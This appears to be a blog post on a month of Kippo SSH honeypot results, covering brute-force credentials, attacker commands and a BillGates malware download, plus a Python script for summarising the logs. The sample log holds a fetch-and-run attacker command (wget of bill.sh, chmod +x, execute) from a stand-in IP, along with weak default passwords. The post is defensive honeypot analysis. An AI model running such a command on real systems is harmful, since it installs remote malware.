Over the last month, I’ve been running Kippo, an SSH honeypot designed to log brute-force attacks and the shell interactions attackers perform once they get in. I thought I’d share some of my results, which have been quite interesting!
More information about Kippo can be found at: https://github.com/desaster/kippo
Starting off with some general stats, I’m surprised by the amount of attention the honeypot has received:
This vertical bar chart displays the top 10 username and password combinations that attackers try when attacking the system:
There seems to be a bit of a theme as to where the connections are coming from (top 5):
I configured a couple of fairly weak username and password combinations so that some logins would succeed, in order to see what the attackers’ next steps would be. The following table displays the top 10 commands (overall) entered by attackers on the honeypot system:
The honeypot keeps a directory for files fetched by its emulated wget command. The following files had been downloaded there:
An MD5 hash search on VirusTotal identifies this as recently discovered malware, specifically Linux/BillGates x32 i86:
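The stats above (top credentials, top source addresses, top commands, downloaded files and their hashes) all come from the same two places: Kippo’s text log and its download directory. The script below is an added example, not code from this post or from the Kippo project, showing how to pull those numbers out. It assumes the layout of Kippo’s `login attempt [user/pass]` and `CMD:` log lines (with the peer IP as the last field of the `HoneyPotTransport` tag); the sample log lines and the `bill.sh` URL in them are constructed for the example and are not from my honeypot.

```python
import hashlib
import re
from collections import Counter

# Patterns for the two kippo.log line types used here. The exact field layout
# is an assumption about Kippo's format; adjust if your build logs differently.
LOGIN_RE = re.compile(
    r"HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] "
    r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)"
)
CMD_RE = re.compile(r"HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")
# Split a chained shell line ("cd /tmp ; wget ... && ./x") into single commands.
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\|)\s*")
URL_RE = re.compile(r"(?:https?|ftp)://\S+")

# Constructed sample log (documentation IP ranges, not real attackers).
SAMPLE_LOG = """\
2015-09-01 10:02:11+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.5] login attempt [root/123456] failed
2015-09-01 10:02:12+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.5] login attempt [root/admin] failed
2015-09-01 10:02:13+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.5] login attempt [root/root] succeeded
2015-09-01 10:02:20+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,203.0.113.5] CMD: uname -a
2015-09-01 10:02:25+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,203.0.113.5] CMD: cd /tmp ; wget http://198.51.100.7/bill.sh ; chmod +x bill.sh ; ./bill.sh
2015-09-01 11:45:01+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.23] login attempt [admin/admin] failed
2015-09-01 11:45:02+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.23] login attempt [root/123456] failed
2015-09-01 11:45:03+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.23] login attempt [root/root] succeeded
2015-09-01 11:45:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,198.51.100.23] CMD: uname -a
2015-09-01 11:45:15+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,4,198.51.100.23] CMD: cat /proc/cpuinfo
2015-09-01 13:10:40+0000 [SSHService ssh-userauth on HoneyPotTransport,5,192.0.2.77] login attempt [root/123456] failed
2015-09-01 13:10:41+0000 [SSHService ssh-userauth on HoneyPotTransport,5,192.0.2.77] login attempt [test/test] failed
"""


def summarize(log_text, top_n=10):
    """Aggregate credentials tried, source IPs, credentials that worked,
    individual commands, and URLs passed to wget from Kippo log text."""
    creds, sources, successes, commands, urls = (Counter() for _ in range(5))
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            creds[(m["user"], m["pw"])] += 1
            sources[m["ip"]] += 1
            if m["result"] == "succeeded":
                successes[(m["user"], m["pw"])] += 1
            continue
        m = CMD_RE.search(line)
        if not m:
            continue
        for cmd in SPLIT_RE.split(m["cmd"].strip()):
            if not cmd:
                continue
            commands[cmd] += 1
            if cmd.split()[0] == "wget":
                urls.update(URL_RE.findall(cmd))
    return {
        "attempts": sum(creds.values()),
        "top_credentials": creds.most_common(top_n),
        "top_sources": sources.most_common(top_n),
        "successful_logins": successes.most_common(top_n),
        "top_commands": commands.most_common(top_n),
        "download_urls": urls.most_common(),
    }


def hashes_for(data):
    """MD5/SHA-1/SHA-256 of a captured download. Look the hashes up on
    VirusTotal or similar; never execute the file itself."""
    return {name: hashlib.new(name, data).hexdigest()
            for name in ("md5", "sha1", "sha256")}


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    print("login attempts:", report["attempts"])
    for key in ("top_credentials", "top_sources", "successful_logins",
                "top_commands", "download_urls"):
        print(key)
        for item, count in report[key]:
            print(f"  {count:4d}  {item}")
    # Hash a constructed stand-in for a file from Kippo's download directory.
    print(hashes_for(b"constructed sample, not real malware"))
```

On a live install, feed `summarize()` the contents of `log/kippo.log` and `hashes_for()` the bytes of each file in the download directory. Counting each `;`/`&&`-separated command separately is a deliberate choice: it surfaces the `wget` and `chmod +x` steps that would otherwise hide inside one long chained line. Treat every downloaded file as hostile: query by hash first, and only upload a sample if you are happy for it to be shared with the scanning vendors.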
More information about this family of malware can be found at:
http://blog.malwaremustdie.org/2015/08/mmd-0039-2015-chinaz-made-new-malware.html
Let’s see what the next month brings!